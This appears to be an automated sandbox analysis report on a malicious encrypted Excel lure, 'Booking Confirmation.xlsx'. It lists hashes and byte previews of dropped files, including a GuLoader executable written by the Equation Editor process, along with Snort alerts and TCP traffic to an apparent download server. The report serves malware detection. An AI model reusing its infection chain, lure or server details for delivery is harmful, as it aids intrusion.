SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D602AD35.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D952E9B2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA8A5653.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4B4CA0B.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7B97C3D.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8124530118203914
Encrypted:	false
SSDEEP:	3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
MD5:	955A9E08DFD3A0E31C7BCF66F9519FFC
SHA1:	F677467423105ACF39B76CB366F08152527052B3
SHA-256:	08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
SHA-512:	39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
Malicious:	false
Preview:	....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\Desktop\~$Booking Confirmation.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	5.822963661672907
Encrypted:	false
SSDEEP:	1536:zK7pvMMhAYlnYgtuELhUQwe6KjEw5bMNccnuMG5reMFbCJQ:zCBqg197dvjEw5yccw5r7d
MD5:	EE83942376EA5717149517FCC832AB9F
SHA1:	EC75B10C6EF046CB63EAA20470AC94529FB4873A
SHA-256:	B3498937A71913D7101FAFB04EB48A791106BEC97E21839B2E1BE8BB55A3F5FC
SHA-512:	431CDD7E43FD6A4C4DF862297EEBC42E9CB68909647B57288A63BFE036D9D0560CC0E97D759BDA096E1389E3CD18D243E627CCE692660E2A384BE430623B2551
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Virustotal, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...@.`R.....................0............... ....@..........................P.......X..........................................(....@..0...................................................................(... ....................................text............................... ..`.data...x.... ....... ..............@....rsrc...0....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995512213537402
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Booking Confirmation.xlsx
File size:	1286656
MD5:	0ff57b2fd3fb489d3cca1e3de4fc98ea
SHA1:	48f428a33c81e6647c399a50a71e5ee03c1c2ef9
SHA256:	36e8b5e6839f88f144b51f690004f0464368d437d099fa74534fe1a6223a6ed2
SHA512:	d1373270a84b44e2cb3507cd5743ad4cd01b3ee868ac22810acb8922b0457a7f06e53fd9f3637744714ed778d6cb7709e04deac8ab82d1c9373309c3748f3aea
SSDEEP:	24576:3EABhEpaKxCPPlkiKLeUapEyKoomeKGjTVE2X4ldfvr1rd9Nxsa:tBhEwKx+KLe25mCX4zj1rdfxsa
File Content Preview:	........................>.......................................................................................................\|.......~...............z......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Booking Confirmation.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1272808

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1272808
Entropy:	7.99982364057
Base64 Encoded:	True
Data ASCII:	. k . . . . . . . . 6 . . . g 9 , . . . . . m J t ' . # . . . 1 . . . @ . . . . [ . X s X . . . . . . . s _ B . . < . a . . . u . d . O & S . . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h H . . S e M H . . . t . ] r . h
Data Raw:	d8 6b 13 00 00 00 00 00 f2 84 36 fc b8 ae 67 39 2c bc a5 c3 90 0f 6d 4a 74 27 ef 23 10 97 83 31 fb bc aa 40 a8 eb 15 cc 5b 88 58 73 58 12 d7 d5 e1 11 b0 99 73 5f 42 a1 8b 3c f5 61 94 06 a2 75 c0 64 17 4f 26 53 15 be a5 fc 74 a3 5d 72 0b 68 48 ee c1 53 65 4d 48 ab a5 fc 74 a3 5d 72 0b 68 48 ee c1 53 65 4d 48 ab a5 fc 74 a3 5d 72 0b 68 48 ee c1 53 65 4d 48 ab a5 fc 74 a3 5d 72 0b 68

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.55277811381
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . z . . G . . . . ( Q e . G . . ; . @ . . . . . . . n . d \\ x . . . . . . . . . . N v . . J . = . . . . . . . . . 1 . . . g . v ' . . . R
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/14/21-08:54:14.406260	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49167	80	192.168.2.22	103.155.82.236

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 14, 2021 08:54:14.156445026 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:14.405617952 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.405777931 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:14.406260014 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:14.656141043 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.656167984 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.656182051 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.656198025 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.656356096 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:14.905258894 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905323029 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905342102 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905359030 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905376911 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905392885 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905411005 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905427933 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:14.905519009 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:14.905545950 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.154512882 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154535055 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154547930 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154563904 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154576063 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154588938 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154602051 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154696941 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154716969 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154731035 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.154748917 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.154756069 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154758930 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.154762983 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154772997 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154791117 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.154825926 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.154836893 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.156949997 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404176950 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404205084 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404230118 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404253960 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404279947 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404299021 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404301882 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404330969 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404340982 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404356956 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404380083 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404387951 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404403925 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404427052 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404434919 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404450893 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404464006 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404474974 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404499054 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404506922 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404525042 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404534101 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404550076 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404563904 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404575109 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404597998 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404604912 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404620886 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404634953 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404645920 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404670000 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404678106 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404695034 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404704094 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404721975 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.404733896 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.404783964 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.408304930 CEST	49167	80	192.168.2.22	103.155.82.236
Jun 14, 2021 08:54:15.654445887 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654474020 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654486895 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654500961 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654512882 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654525042 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654541969 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654560089 CEST	80	49167	103.155.82.236	192.168.2.22
Jun 14, 2021 08:54:15.654575109 CEST	80	49167	103.155.82.236	192.168.2.22
